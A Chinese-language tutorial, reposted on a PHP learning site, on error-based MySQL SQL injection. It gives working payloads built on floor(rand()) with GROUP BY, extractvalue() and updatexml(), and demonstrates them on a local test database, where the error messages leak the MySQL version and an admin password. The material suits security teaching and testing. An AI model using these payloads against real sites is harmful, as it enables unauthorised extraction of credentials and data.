来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。实际测试环境:1...
|
放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
实际测试环境:
1 mysql> show tables;
2 +----------------+
3 | Tables_in_test |
4 +----------------+
5 | admin |
6 | article |
7 +----------------+
1 mysql> describe admin;
2 +-------+------------------+------+-----+---------+----------------+
3 | Field | Type | Null | Key | Default | Extra |
4 +-------+------------------+------+-----+---------+----------------+
5 | id | int(10) unsigned | NO | PRI | NULL | auto_increment |
6 | user | varchar(50) | NO | | NULL | |
7 | pass | varchar(50) | NO | | NULL | |
8 +-------+------------------+------+-----+---------+----------------+
1 mysql> describe article;
2 +---------+------------------+------+-----+---------+----------------+
3 | Field | Type | Null | Key | Default | Extra |
4 +---------+------------------+------+-----+---------+----------------+
5 | id | int(10) unsigned | NO | PRI | NULL | auto_increment |
6 | title | varchar(50) | NO | | NULL | |
7 | content | varchar(50) | NO | | NULL | |
8 +---------+------------------+------+-----+---------+----------------+
1、通过floor报错
可以通过如下一些利用代码
1 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
2 from information_schema.tables group by x)a);
1 and (select count(*) from (select 1 union select null union select !1)x
2 group by concat((select table_name from information_schema.tables limit 1),
3 floor(rand(0)*2)));
举例如下:
首先进行正常查询:
1 mysql> select * from article where id = 1;
2 +----+-------+---------+
3 | id | title | content |
4 +----+-------+---------+
5 | 1 | test | do it |
6 +----+-------+---------+
假如id输入存在注入的话,可以通过如下语句进行报错。
1 mysql> select * from article where id = 1 and (select 1 from
2 (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
3 ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
例如我们需要查询管理员用户名和密码:
Method1:
1 mysql> select * from article where id = 1 and (select 1 from
2 (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
3 from information_schema.tables group by x)a);
4 ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method2:
1 mysql> select * from article where id = 1 and (select count(*)
2 from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
3 floor(rand(0)*2)));
4 ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2、ExtractValue
测试语句如下
1 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
实际测试过程
1 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
2 (select pass from admin limit 1)));--
3 ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3、UpdateXml
测试语句
1 and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
实际测试过程
www.2cto.com
1 mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
2 (select pass from admin limit 1),0x5e24),1));
3 ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
All, thanks foreign guys.
link:http://blog.ourren.com/2012/11/03/pentest_method_of_mysql_error.html
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
